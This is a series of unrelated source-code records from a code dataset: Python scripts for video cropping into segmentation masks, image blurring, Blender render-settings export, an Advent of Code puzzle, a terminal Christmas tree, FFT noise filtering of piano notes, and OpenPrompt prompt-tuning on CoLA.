biblioteca shapely\n frame_polygon = None\n #verifica se arquivo existe\n if not df_polygon is None:\n frame_polygon = Polygon(df_polygon.iloc[n_frame]['polygon']).buffer(0)\n \n #transformar multipoligono num poligono so\n if frame_polygon.geom_type == 'MultiPolygon': \n \n frame_polygon =unary_union(list(frame_polygon))\n if frame_polygon.geom_type == 'MultiPolygon':\n \n polys = list(frame_polygon)\n area = 0\n index = None\n \n for i, pl in enumerate(polys):\n if pl.area > area:\n area = pl.area\n index = i\n \n frame_polygon = polys[index]\n \n \n \n #mask = np.zeros((altura_imagem, largura_imagem))\n mask = np.full((altura_imagem, largura_imagem), 0, dtype=np.uint8)\n \n \n \n coords = np.array([[x[0], x[1]] for x in list(frame_polygon.exterior.coords)], dtype=np.int32)\n \n coords = coords.reshape((-1,1,2))\n \n mask = cv2.fillPoly(mask,[coords], 1)\n \n #itera sobre as configuracoes de recorte\n for c, config in enumerate(configs):\n #definicao de tamanho de recorte para os quadrados\n image_size_side = config[0]\n #para definir o overlaping entre as imagens, nesse caso sem overlaping\n stride = config[1]\n \n #percentual minimo de planta necessario no poligono para salvar \n percentual_maximo = config[2]\n percentual_minimo = config[3]\n altura = 0\n #itera sobre a altura da imagem\n k = 0\n \n \n while(altura+image_size_side < altura_imagem):\n \n largura = 0\n #itera sobre a largura da imagem\n while(largura+image_size_side < largura_imagem):\n #corta imagem\n crop_img = frame[altura:altura+image_size_side, largura:largura+image_size_side]\n \n #corta poligono\n crop_polygon = Polygon([(altura, largura), (altura, largura+image_size_side), (altura+image_size_side, largura+image_size_side), (altura+image_size_side, largura)])\n \n #corta mascara\n crop_mask = mask[altura:altura+image_size_side, largura:largura+image_size_side]\n \n #resize das imagens\n resized = cv2.resize(crop_img, tam_salvar, interpolation = cv2.INTER_AREA)\n resized_mask = cv2.resize(crop_mask, tam_salvar, interpolation = cv2.INTER_AREA)\n \n #se o poligono existir faz os calculos para verificar se salva os crops\n if (crop_polygon.intersects(frame_polygon)):\n area_interseccao = crop_polygon.intersection(frame_polygon).area\n 
area_crop_polygon = crop_polygon.area\n \n if(area_interseccao/area_crop_polygon > percentual_minimo and area_interseccao/area_crop_polygon <= percentual_maximo):\n cv2.imwrite(os.path.join(path_to_save, row['set'], 'image', row['class']+'-'+ row['name'].split('.')[0]+'-{}-{}-{}-{},{}_{},{}.jpg'.format(n_frame, c, k, largura, altura, largura+image_size_side, altura+image_size_side)), resized)\n cv2.imwrite(os.path.join(path_to_save, row['set'], 'mask', row['class']+'-'+ row['name'].split('.')[0]+'-{}-{}-{}-{},{}_{},{}.png'.format(n_frame, c, k, largura, altura, largura+image_size_side, altura+image_size_side)), resized_mask)\n # print('nome: ', os.path.join(path_to_save, row['set'], row['class'], row['name']+'-{}-{}.jpg'.format(n_frame, k)))\n # print('area interseccao: ', area_interseccao)\n # print('area crop: ', area_crop_polygon)\n # print('percentual de area: ', area_interseccao/area_crop_polygon)\n # print('blurry: ', variance_of_laplacian(crop_img))\n # print('---------------------------------\\n')\n \n \n \n #atualiza a largura com o valor do passo\n largura = largura + stride\n k = k+1\n #atualiza a altura com o valor do passo\n altura = altura+stride\n #caso o resultado nao exista significa que nao há mais frames e portanto e hora de parar\n except:\n print(\"Something else went wrong\")\n else:\n continua = False\n print('read falso')\n \n #avanca frames manualmente em 15 frames\n for i in range(next_frame):\n cap.read()\n \n #conta o avanco mais um, porque no proximo read o avanco nao e contabilizado...\n n_frame = n_frame + next_frame + 1\n \n #se avanco se estender aos últimos 10 frames ignora\n if n_frame > length-10:\n continua = False\n #print('ignorando os 10 ultimos frames para evitar perda de processamento e imagens borradas nos videos que nao foram marcados')\n #print('=======================================\\n')\n \n #libera o video\n cap.release()","repo_name":"Computational-Intelligence-Lab-UTAD/classificacao_de_castas_cnns","sub_path":"utilitarios/prepara_dataset_segmentacao.py","file_name":"prepara_dataset_segmentacao.py","file_ext":"py","file_size_in_byte":11311,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29621253021","text":"# coding:iso-8859-9 Türkçe\r\n\r\n# python -m pip install Pillow\r\n# easy_install Pillow\r\n\r\nfrom PIL import Image, ImageFilter\r\n\r\nprint (\"PIL modülünü kurma ve resmi varsayýlý göstericiyle net/bulanýk görüntülrme\")\r\ntry:\r\n orijinalResim = Image.open (\"resim/nissan.png\")\r\n orijinalResim.show()\r\n bulanýkResim = orijinalResim.filter (ImageFilter.BLUR)\r\n bulanýkResim.show()\r\n #bulanýkResim.save (\"bulanýk.png\")\r\nexcept:\r\n print (\"HATA: Bulanýk resmi saklayamýyorum!..\")\r\n","repo_name":"mnihatyavas/Python-uygulamalar","sub_path":"Brian Heinold (243) ile Python/p32206e.py","file_name":"p32206e.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36237402171","text":"import bpy\nimport json\n\n#read json\ndef read_json(filepath):\n with open(filepath, \"r\") as read_file:\n data = json.load(read_file)\n return data\n\n#create json\ndef create_json(filepath, data):\n with open(filepath, \"w\") as write_file:\n json.dump(data, write_file)\n\n#format render settings infos\ndef format_render_settings_info():\n scene=bpy.context.scene\n rd=scene.render\n im=rd.image_settings\n cy=scene.cycles\n cu=scene.cycles_curves\n \n datas = {\n \"settings\": {\n \n 
#render\n \"feature_set\": cy.feature_set,\n #\"device\": cy.device,\n \"shading_system\": cy.shading_system,\n \n #dimensions\n \"resolution_x\": rd.resolution_x,\n \"resolution_y\": rd.resolution_y,\n \"resolution_percentage\": rd.resolution_percentage,\n \n #output\n \"use_overwrite\": rd.use_overwrite,\n \"use_placeholder\": rd.use_placeholder,\n \"use_file_extension\": rd.use_file_extension,\n \"use_render_cache\": rd.use_render_cache,\n \"file_format\": im.file_format,\n \"color_mode\": im.color_mode,\n \"color_depth\": im.color_depth,\n \"exr_codec\": im.exr_codec,\n \"compression\": im.compression,\n \n #sampling\n \"progressive\": cy.progressive,\n \n \"use_square_samples\": cy.use_square_samples,\n \"seed\": cy.seed,\n \"use_animated_seed\": cy.use_animated_seed,\n \"sample_clamp_direct\": cy.sample_clamp_direct,\n \"sample_clamp_indirect\": cy.sample_clamp_indirect,\n \"light_sampling_threshold\": cy.light_sampling_threshold,\n \"aa_samples\": cy.aa_samples,\n \"preview_aa_samples\": cy.preview_aa_samples,\n \"sample_all_lights_direct\": cy.sample_all_lights_direct,\n \"sample_all_lights_indirect\": cy.sample_all_lights_indirect,\n \"sampling_pattern\": cy.sampling_pattern,\n \n \"samples\": cy.samples,\n \"preview_samples\": cy.preview_samples,\n \n \"diffuse_samples\": cy.diffuse_samples,\n \"glossy_samples\": cy.glossy_samples,\n \"transmission_samples\": cy.transmission_samples,\n \"ao_samples\": cy.ao_samples,\n \"mesh_light_samples\": cy.mesh_light_samples,\n \"subsurface_samples\": cy.subsurface_samples,\n \"volume_samples\": cy.volume_samples,\n \n #geometry\n \"volume_step_size\": cy.volume_step_size,\n \"volume_max_steps\": cy.volume_max_steps,\n \n \"use_curves\": cu.use_curves,\n \n \"primitive\": cu.primitive,\n \"shape\": cu.shape,\n \"cull_backfacing\": cu.cull_backfacing,\n \"minimum_width\": cu.minimum_width,\n \"maximum_width\": cu.maximum_width,\n \"subdivisions\": cu.subdivisions,\n \n #light path\n \"transparent_max_bounces\": cy.transparent_max_bounces,\n \"transparent_min_bounces\": cy.transparent_min_bounces,\n \"use_transparent_shadows\": cy.use_transparent_shadows,\n \"caustics_reflective\": cy.caustics_reflective,\n \"caustics_refractive\": cy.caustics_refractive,\n \"blur_glossy\": cy.blur_glossy,\n \"max_bounces\": cy.max_bounces,\n \"min_bounces\": cy.min_bounces,\n \"diffuse_bounces\": cy.diffuse_bounces,\n \"diffuse_bounces\": cy.diffuse_bounces,\n \"transmission_bounces\": cy.transmission_bounces,\n \"volume_bounces\": cy.volume_bounces,\n \n #motion blur\n \"use_motion_blur\": rd.use_motion_blur,\n \"motion_blur_position\": cy.motion_blur_position,\n \"rolling_shutter_type\": cy.rolling_shutter_type,\n \"rolling_shutter_duration\": cy.rolling_shutter_duration,\n \n #film\n \"film_exposure\": cy.film_exposure,\n \"film_transparent\": cy.film_transparent,\n \"pixel_filter_type\": cy.pixel_filter_type,\n \"filter_width\": cy.filter_width,\n \n #performance\n \"threads_mode\": rd.threads_mode,\n \"threads\": rd.threads,\n \"tile_order\": cy.tile_order,\n #\"tile_x\": rd.tile_x,\n #\"tile_y\": rd.tile_y,\n \"use_progressive_refine\": cy.use_progressive_refine,\n \"use_save_buffers\": rd.use_save_buffers,\n \"debug_bvh_type\": cy.debug_bvh_type,\n \"preview_start_resolution\": cy.preview_start_resolution,\n \"use_persistent_data\": rd.use_persistent_data,\n \"debug_use_spatial_splits\": cy.debug_use_spatial_splits,\n \"debug_use_hair_bvh\": cy.debug_use_hair_bvh,\n \"debug_bvh_time_steps\": cy.debug_bvh_time_steps,\n \n #post processing\n 
\"use_compositing\": rd.use_compositing,\n \"use_sequencer\": rd.use_sequencer,\n \"dither_intensity\": rd.dither_intensity,\n \n },\n }\n return datas\n\n#apply render settings from json data set\ndef apply_render_settings_from_dataset(datas):\n scene=bpy.context.scene\n rd=scene.render\n im=rd.image_settings\n cy=scene.cycles\n cu=scene.cycles_curves\n\n #render\n cy.feature_set=datas['settings'][\"feature_set\"]\n #cy.device=datas['settings'][\"device\"]\n cy.shading_system=datas['settings'][\"shading_system\"]\n \n #dimensions\n rd.resolution_x=datas['settings'][\"resolution_x\"]\n rd.resolution_y=datas['settings'][\"resolution_y\"]\n rd.resolution_percentage=datas['settings'][\"resolution_percentage\"]\n \n #output\n rd.use_overwrite=datas['settings'][\"use_overwrite\"]\n rd.use_placeholder=datas['settings'][\"use_placeholder\"]\n rd.use_file_extension=datas['settings'][\"use_file_extension\"]\n rd.use_render_cache=datas['settings'][\"use_render_cache\"]\n im.file_format=datas['settings'][\"file_format\"]\n im.color_mode=datas['settings'][\"color_mode\"]\n im.color_depth=datas['settings'][\"color_depth\"]\n im.exr_codec=datas['settings'][\"exr_codec\"]\n im.compression=datas['settings'][\"compression\"]\n \n #sampling\n cy.progressive=datas['settings'][\"progressive\"]\n \n cy.use_square_samples=datas['settings'][\"use_square_samples\"]\n cy.seed=datas['settings'][\"seed\"]\n cy.use_animated_seed=datas['settings'][\"use_animated_seed\"]\n cy.sample_clamp_direct=datas['settings'][\"sample_clamp_direct\"]\n cy.sample_clamp_indirect=datas['settings'][\"sample_clamp_indirect\"]\n cy.light_sampling_threshold=datas['settings'][\"light_sampling_threshold\"]\n cy.aa_samples=datas['settings'][\"aa_samples\"]\n cy.preview_aa_samples=datas['settings'][\"preview_aa_samples\"]\n cy.sample_all_lights_direct=datas['settings'][\"sample_all_lights_direct\"]\n cy.sample_all_lights_indirect=datas['settings'][\"sample_all_lights_indirect\"]\n cy.sampling_pattern=datas['settings'][\"sampling_pattern\"]\n \n cy.samples=datas['settings'][\"samples\"]\n cy.preview_samples=datas['settings'][\"preview_samples\"]\n \n cy.diffuse_samples=datas['settings'][\"diffuse_samples\"]\n cy.glossy_samples=datas['settings'][\"glossy_samples\"]\n cy.transmission_samples=datas['settings'][\"transmission_samples\"]\n cy.ao_samples=datas['settings'][\"ao_samples\"]\n cy.mesh_light_samples=datas['settings'][\"mesh_light_samples\"]\n cy.subsurface_samples=datas['settings'][\"subsurface_samples\"]\n cy.volume_samples=datas['settings'][\"volume_samples\"]\n \n #geometry\n cy.volume_step_size=datas['settings'][\"volume_step_size\"]\n cy.volume_max_steps=datas['settings'][\"volume_max_steps\"]\n \n cu.use_curves=datas['settings'][\"use_curves\"]\n \n cu.primitive=datas['settings'][\"primitive\"]\n cu.shape=datas['settings'][\"shape\"]\n cu.cull_backfacing=datas['settings'][\"cull_backfacing\"]\n cu.minimum_width=datas['settings'][\"minimum_width\"]\n cu.maximum_width=datas['settings'][\"maximum_width\"]\n cu.subdivisions=datas['settings'][\"subdivisions\"]\n \n #light path\n cy.transparent_max_bounces=datas['settings'][\"transparent_max_bounces\"]\n cy.transparent_min_bounces=datas['settings'][\"transparent_min_bounces\"]\n cy.use_transparent_shadows=datas['settings'][\"use_transparent_shadows\"]\n cy.caustics_reflective=datas['settings'][\"caustics_reflective\"]\n cy.caustics_refractive=datas['settings'][\"caustics_refractive\"]\n cy.blur_glossy=datas['settings'][\"blur_glossy\"]\n 
cy.max_bounces=datas['settings'][\"max_bounces\"]\n cy.min_bounces=datas['settings'][\"min_bounces\"]\n cy.diffuse_bounces=datas['settings'][\"diffuse_bounces\"]\n cy.diffuse_bounces=datas['settings'][\"diffuse_bounces\"]\n cy.transmission_bounces=datas['settings'][\"transmission_bounces\"]\n cy.volume_bounces=datas['settings'][\"volume_bounces\"]\n \n #motion blur\n rd.use_motion_blur=datas['settings'][\"use_motion_blur\"]\n cy.motion_blur_position=datas['settings'][\"motion_blur_position\"]\n cy.rolling_shutter_type=datas['settings'][\"rolling_shutter_type\"]\n cy.rolling_shutter_duration=datas['settings'][\"rolling_shutter_duration\"]\n \n #film\n cy.film_exposure=datas['settings'][\"film_exposure\"]\n cy.film_transparent=datas['settings'][\"film_transparent\"]\n cy.pixel_filter_type=datas['settings'][\"pixel_filter_type\"]\n cy.filter_width=datas['settings'][\"filter_width\"]\n \n #performance\n rd.threads_mode=datas['settings'][\"threads_mode\"]\n rd.threads=datas['settings'][\"threads\"]\n cy.tile_order=datas['settings'][\"tile_order\"]\n #rd.tile_x=datas['settings'][\"tile_x\"]\n #rd.tile_y=datas['settings'][\"tile_y\"]\n cy.use_progressive_refine=datas['settings'][\"use_progressive_refine\"]\n rd.use_save_buffers=datas['settings'][\"use_save_buffers\"]\n cy.debug_bvh_type=datas['settings'][\"debug_bvh_type\"]\n cy.preview_start_resolution=datas['settings'][\"preview_start_resolution\"]\n rd.use_persistent_data=datas['settings'][\"use_persistent_data\"]\n cy.debug_use_spatial_splits=datas['settings'][\"debug_use_spatial_splits\"]\n cy.debug_use_hair_bvh=datas['settings'][\"debug_use_hair_bvh\"]\n cy.debug_bvh_time_steps=datas['settings'][\"debug_bvh_time_steps\"]\n \n #post processing\n rd.use_compositing=datas['settings'][\"use_compositing\"]\n rd.use_sequencer=datas['settings'][\"use_sequencer\"]\n rd.dither_intensity=datas['settings'][\"dither_intensity\"]\n","repo_name":"samytichadou/ND_addon_blender","sub_path":"render_settings_functions.py","file_name":"render_settings_functions.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"42043985148","text":"from itertools import permutations\n\nscores = {}\nbestScore = 0\n\ndef calculateScore(order):\n total = 0\n for i in range(len(order)):\n total += int(scores[order[i]][order[(i+1)%len(order)]])\n total += int(scores[order[i]][order[(i-1)%len(order)]])\n return total\n\nwith open(\"Input\") as inFile:\n lines = inFile.readlines()\n\n for line in lines:\n parts = line.split()\n if parts[0] not in scores:\n scores[parts[0]] = {}\n scores[parts[0]][parts[10][:-1]] = parts[3] if parts[2] == 'gain' else int(parts[3]) * -1\n\n for perm in permutations(scores):\n score = calculateScore(perm)\n bestScore = max(score, bestScore)\n\n print(\"Part 1:\", bestScore)\n\n scores[\"me\"] = {}\n for score in scores:\n if score != \"me\":\n scores[score][\"me\"] = 0\n scores[\"me\"][score] = 0\n\n bestScore = 0\n for perm in permutations(scores):\n score = calculateScore(perm)\n bestScore = max(score, bestScore)\n\n print(\"Part 2:\", bestScore)","repo_name":"danksalot/AdventOfCode","sub_path":"2015/Day13/Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70431091292","text":"from random import randint\nfrom time import sleep\nrnd2 = randint(1,30)\ncolor=0\ndef gentree():\n print(\"\\033c\",\"\\033[0m\")\n for 
x in range(1,23):\n rnd1 = randint(1,rnd2)\n color=randint(0,1)\n if x==1:\n ch=\"$\"\n elif rnd1%4==0:\n ch=\"o\"\n elif rnd1%3==0:\n ch=\"i\"\n else:\n ch=\"*\"\n #if color == 0:\n colors='\\033[1;31m'\n #else:\n colors='\\033[1;32m'\n\n print(\"{:^33}\".format(ch*x))\n\n print(\"\\033[33m{:^33}\".format(\"|||\"))\n print(\"{:^33}\\033[0m\".format(\"|||\"))\n sleep(.75)\nwhile True:\n gentree()\n","repo_name":"rsd1244/python","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12280619936","text":"from scipy.fftpack import fft\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sounddevice as sd\n\n\n#setting number of samples and frequency axis range\nN = 3*1024\nf = np.linspace(0,512,int(N/2))\n\nt= np.linspace(0,3,12*1024)\n\n#generating noise signal using random frequencies \nf_n = np.random.randint(0,512,2) \nnoise = np.sin(2*np.pi*f_n[0]*t) + np.sin(2*np.pi*f_n[1]*t)\n\n\n\n#array storing third octave frequencies\nthird_octave_freq = [196,146.83,196,246.93,196,146.83]\n#array storing fourth octave frequencies\nfourth_octave_freq = [392,493.88,261.63,293.66,392,493.88]\n#array storing varying time intervals between notes\ntime_between_notes = [0.2,0.1,0.3,0.2,0.1]\n#array storing the value of each note endpoint\nend_point= [0.4,0.9,1.5,2,2.4,3]\n#variable storing each note startpoint\ni= 0\n#final signal summing all song notes\nx=0\n#counter for endpoint and frequency arrays\nn =0\n#counter for time_between_notes array\nl=0\n\n\n##looping over the 3 second duration, each time creating two signals\n##and summing them to the final signal\n##updating counters and checking condition to exit the loop\nwhile i<3 :\n x1=np.where(np.logical_and(t>=i,t<=end_point[n]),np.sin(2*np.pi*third_octave_freq[n]*t),0)\n x2=np.where(np.logical_and(t>=i,t<=end_point[n]),np.sin(2*np.pi*fourth_octave_freq[n]*t),0)\n x = x+x1+x2\n if l == 5:\n break\n i = (end_point[n]+time_between_notes[l])\n n = n+1\n l = l+1\n\n\n#converting original time signal to frequency signal\nx_f = fft(x)\nx_f = 2/N * np.abs(x_f[0:int(N/2)])\n\n#adding generated noise to original signal and getting its corresponding signal in frequency domain\nx_n = x + noise\nx_nf = fft(x_n)\nx_nf = 2/N * np.abs(x_nf[0:int(N/2)])\n\n\n#using array to store the noise frequencies founnd in the signal\nf_found= np.arange(0,2)\n#looping over the frequency range to find the noise frequencies and stroing them in the array\nj =0\ntemp = 0 ;\nmaxAmplitude = np.ceil(max(x_f))\nwhile j < f.size :\n if x_nf[j] >maxAmplitude :\n f_found[temp]=f[j]\n temp +=1\n j +=1\n \n#rounding frequencies since we use integer values and then removing the noise to get the filtered signal\nf_found[0] = np.round(f_found[0])\nf_found[1] = np.round(f_found[1])\nx_filtered = x_n - ( np.sin(2*f_found[0]*np.pi*t)+np.sin(2*f_found[1]*np.pi*t) )\n\n#converting filtered time signal to frequency signal\nx_fil_fft = fft(x_filtered)\nx_fil_fft = 2/N * np.abs(x_fil_fft[0:int(N/2)])\n\n\n#plotting all 
grapghs\nplt.subplot(3,2,1)\nplt.plot(t,x)\nplt.subplot(3,2,2)\nplt.plot(f,x_f)\nplt.subplot(3,2,3)\nplt.plot(t,x_n)\nplt.subplot(3,2,4)\nplt.plot(f,x_nf)\nplt.subplot(3,2,5)\nplt.plot(t,x_filtered)\nplt.subplot(3,2,6)\nplt.plot(f,x_fil_fft)\n\n\n\nsd.play(x_filtered,3*1024)\n\n\n\n\n","repo_name":"AdhamAllamx/Noise_Cancelation_Piano","sub_path":"Noise_Cancelltion_Piano.py","file_name":"Noise_Cancelltion_Piano.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10813975447","text":"\"\"\"Test some code snippets\"\"\"\nimport os\nimport torch\nfrom loguru import logger\nfrom openprompt.plms import load_plm\nfrom openprompt.prompts import ManualTemplate\nfrom openprompt.prompts import ManualVerbalizer\nfrom openprompt import PromptForClassification\nfrom openprompt.data_utils import InputExample\nfrom openprompt import PromptDataLoader\nfrom openprompt.data_utils import InputFeatures\nfrom utils import pickle_read\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,\n TensorDataset)\n\n\n# class CoLAPromptTemple(object):\n# def __init__(self, data_path):\n# self.data_path = data_path\n\n\n# dataset = [ # For simplicity, there's only two examples\n# # text_a is the input text of the data, some other datasets may have multiple input sentences in one example.\n# InputExample(\n# guid=0,\n# text_a=\"Albert Einstein was one of the greatest intellects of his time.\",\n# ),\n# InputExample(\n# guid=1,\n# text_a=\"The film was badly made.\",\n# ),\n# ]\n\nclass MyManualTemplate(ManualTemplate):\n def wrap_one_example(self,\n example: InputExample):\n if self.text is None:\n raise ValueError(\"template text has not been initialized\")\n\n text = self.incorporate_text_example(example)\n\n # not_empty_keys = example.keys()\n not_empty_keys = [key for key in example.__dict__.keys() if getattr(example, key) is not None]\n for placeholder_token in self.placeholder_mapping:\n not_empty_keys.remove(self.placeholder_mapping[placeholder_token]) # placeholder has been processed, remove\n if \"meta\" in not_empty_keys:\n not_empty_keys.remove('meta') # meta has been processed\n\n keys, values = ['text'], [text]\n for inputflag_name in self.registered_inputflag_names:\n keys.append(inputflag_name)\n v = None\n if hasattr(self, inputflag_name) and getattr(self, inputflag_name) is not None:\n v = getattr(self, inputflag_name)\n elif hasattr(self, \"get_default_\" + inputflag_name):\n v = getattr(self, \"get_default_\" + inputflag_name)()\n setattr(self, inputflag_name, v) # cache\n else:\n raise ValueError(\"\"\"\n Template's inputflag '{}' is registered but not initialize.\n Try using template.{} = [...] 
to initialize\n or create an method get_default_{}(self) in your template.\n \"\"\".format(inputflag_name, inputflag_name, inputflag_name))\n\n if len(v) != len(text):\n raise ValueError(\"Template: len({})={} doesn't match len(text)={}.\" \\\n .format(inputflag_name, len(v), len(text)))\n values.append(v)\n wrapped_parts_to_tokenize = []\n for piece in list(zip(*values)):\n wrapped_parts_to_tokenize.append(dict(zip(keys, piece)))\n\n wrapped_parts_not_tokenize = {key: getattr(example, key) for key in not_empty_keys}\n return [wrapped_parts_to_tokenize, wrapped_parts_not_tokenize]\n\n\ndef build_dataloader(features, mode=\"train\", model_type=\"roberta\", train_batch_size=5,\n output_mode=\"classification\", tuning_type=\"prompt\"):\n # Convert to Tensors and build dataset\n all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)\n all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n\n if model_type not in [\"distilbert\", \"roberta\"]:\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)\n else:\n # distilbert and roberta don't have token_type_ids\n all_token_type_ids = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n\n if output_mode == \"classification\":\n all_labels = torch.tensor([f.label for f in features], dtype=torch.long)\n elif output_mode == \"regression\":\n all_labels = torch.tensor([f.label for f in features], dtype=torch.float)\n\n if \"prompt\" in tuning_type:\n all_loss_ids = torch.tensor([f.loss_ids for f in features], dtype=torch.float)\n dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels, all_loss_ids)\n else:\n dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)\n\n sampler = RandomSampler(dataset) if mode == \"train\" else SequentialSampler(dataset)\n dataloader = DataLoader(dataset, sampler=sampler, batch_size=train_batch_size)\n\n return dataloader\n\n\ndef convert_glue_to_manual_features(samples, prompt_template,\n wrapped_tokenizer, label_list):\n label_map = {label: i for i, label in enumerate(label_list)}\n features = []\n for sample in samples:\n wrapped_example = prompt_template.wrap_one_example(sample)\n tokenized_example = wrapped_tokenizer.tokenize_one_example(\n wrapped_example, teacher_forcing=False)\n feature = InputFeatures(**tokenized_example, **wrapped_example[1])\n feature.label = label_map[feature.label]\n features.append(feature)\n return features\n\n\n# model_inputs = {}\n# for split in ['train', 'valid', 'test']:\n# model_inputs[split] = []\n# for sample in raw_data[split][0:10]:\n# wrapped_example = promptTemplate.wrap_one_example(sample)\n# tokenized_example = wrapped_tokenizer.tokenize_one_example(\n# wrapped_example, teacher_forcing=False)\n# feature = InputFeatures(**tokenized_example, **wrapped_example[1])\n# model_inputs[split].append(feature)\n\ntask_name = \"cola\"\nraw_dataset_path = os.path.join(\"/workspace/data/fedglue/\", f\"{task_name}_data.pkl\")\nraw_data = pickle_read(raw_dataset_path)\n\nplm, tokenizer, model_config, WrapperClass = load_plm(\"roberta\", \"/workspace/pretrain/nlp/roberta-base/\")\n\npromptTemplate = MyManualTemplate(\n # text='{\"placeholder\":\"text_a\"} It was {\"mask\"}',\n text='{\"placeholder\":\"text_a\"} This is {\"mask\"} .',\n tokenizer=tokenizer,\n)\n\nlabel_list = [ # There are two classes in Sentiment Analysis, one for negative and one for positive\n \"0\",\n \"1\"\n]\nlabel_words = {\n \"0\": 
[\"incorrect\", ],\n \"1\": [\"correct\"],\n}\npromptVerbalizer = ManualVerbalizer(\n classes=label_list,\n label_words=label_words,\n tokenizer=tokenizer,\n)\n\n# wrapped_example = promptTemplate.wrap_one_example(raw_data['train'][0])\n# print(wrapped_example)\n\nwrappedTokenizer = WrapperClass(max_seq_length=128, tokenizer=tokenizer, truncate_method=\"head\")\n\ntrain_features = convert_glue_to_manual_features(\n raw_data[\"train\"],\n prompt_template=promptTemplate,\n wrapped_tokenizer=wrappedTokenizer,\n label_list=label_list\n)\ntrain_data_loader = build_dataloader(train_features)\n\nvalid_features = convert_glue_to_manual_features(\n raw_data[\"valid\"],\n prompt_template=promptTemplate,\n wrapped_tokenizer=wrappedTokenizer,\n label_list=label_list\n)\ntrain_data_loader = build_dataloader(train_features, train_batch_size=32)\nvalid_data_loader = build_dataloader(\n valid_features, mode=\"valid\",\n train_batch_size=32)\n# You can see what a tokenized example looks like by\n# tokenized_example = wrapped_tokenizer.tokenize_one_example(wrapped_example, teacher_forcing=False)\n# print(tokenized_example)\n# print(tokenizer.convert_ids_to_tokens(tokenized_example['input_ids']))\n\n# print(promptVerbalizer.label_words_ids)\n# logits = torch.randn(2, len(tokenizer)) # creating a pseudo output from the plm, and\n# print(promptVerbalizer.process_logits(logits)) # see what the verbalizer do\n\n# model_inputs = {}\n# for split in ['train', 'valid', 'test']:\n# model_inputs[split] = []\n# for sample in raw_data[split][0:10]:\n# wrapped_example = promptTemplate.wrap_one_example(sample)\n# tokenized_example = wrapped_tokenizer.tokenize_one_example(\n# wrapped_example, teacher_forcing=False)\n# feature = InputFeatures(**tokenized_example, **wrapped_example[1])\n# model_inputs[split].append(feature)\n\npromptModel = PromptForClassification(\n template=promptTemplate,\n plm=plm,\n verbalizer=promptVerbalizer,\n freeze_plm=False\n)\nfrom utils import get_parameter_number\n\nprint(get_parameter_number(promptModel))\n#\n# data_loader = PromptDataLoader(\n# dataset=raw_data['train'],\n# # tokenizer=tokenizer,\n# tokenizer_wrapper=wrapped_tokenizer,\n# template=promptTemplate,\n# tokenizer_wrapper_class=WrapperClass,\n# )\n\n\npromptModel = promptModel.cuda()\n\n# Now the training is standard\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\nnum_train_epochs = 10\nloss_func = torch.nn.CrossEntropyLoss()\nno_decay = ['bias', 'LayerNorm.weight']\n# it's always good practice to set no decay to biase and LayerNorm parameters\noptimizer_grouped_parameters = [\n {'params': [p for n, p in promptModel.named_parameters() if not any(nd in n for nd in no_decay)],\n 'weight_decay': 0.01},\n {'params': [p for n, p in promptModel.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n]\noptimizer = AdamW(optimizer_grouped_parameters, lr=1e-4)\nt_total = len(train_data_loader) * num_train_epochs\nscheduler = get_linear_schedule_with_warmup(\n optimizer, num_warmup_steps=0,\n num_training_steps=t_total\n )\nfor epoch in range(num_train_epochs):\n tot_loss = 0\n for step, batch in enumerate(train_data_loader):\n\n batch = tuple(t.cuda() for t in batch)\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'label': batch[3],\n 'loss_ids': batch[4]\n }\n\n logits = promptModel(inputs)\n # label_ids = batch[3]\n label_ids = inputs[\"label\"]\n loss = loss_func(logits, label_ids)\n loss.requires_grad_(True)\n loss.backward()\n tot_loss += loss.item()\n optimizer.step()\n 
scheduler.step()\n optimizer.zero_grad()\n\n print(\"Epoch {}, average loss: {}\".format(epoch, tot_loss / len(train_data_loader)), flush=True)\n\nallpreds = []\nalllabels = []\nfor step, batch in enumerate(valid_data_loader):\n batch = tuple(t.cuda() for t in batch)\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'label': batch[3],\n 'loss_ids': batch[4]\n }\n logits = promptModel(inputs)\n labels = inputs['label']\n alllabels.extend(labels.cpu().tolist())\n allpreds.extend(torch.argmax(logits, dim=-1).cpu().tolist())\n\nacc = sum([int(i == j) for i, j in zip(allpreds, alllabels)]) / len(allpreds)\nprint(acc)\nfrom sklearn.metrics import matthews_corrcoef\nprint(matthews_corrcoef(alllabels, allpreds))\n\n# promptModel.eval()\n# with torch.no_grad():\n# for batch in data_loader:\n# logits = promptModel(batch)\n# preds = torch.argmax(logits, dim = -1)\n# print(classes[preds])\n\n\n# logger.info(promptModel)\n","repo_name":"SMILELab-FL/FedPETuning","sub_path":"tools/backup/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11007,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"29798828085","text":"# coding: utf-8\n\nimport os as _os\nimport time as _time\nimport json as _json\nimport shlex as _shlex\nimport operator as _op\nimport subprocess as _sp\nimport logging as _logging\nimport tempfile as _tempfile\nimport contextlib as _contextlib\n\n\n_log = 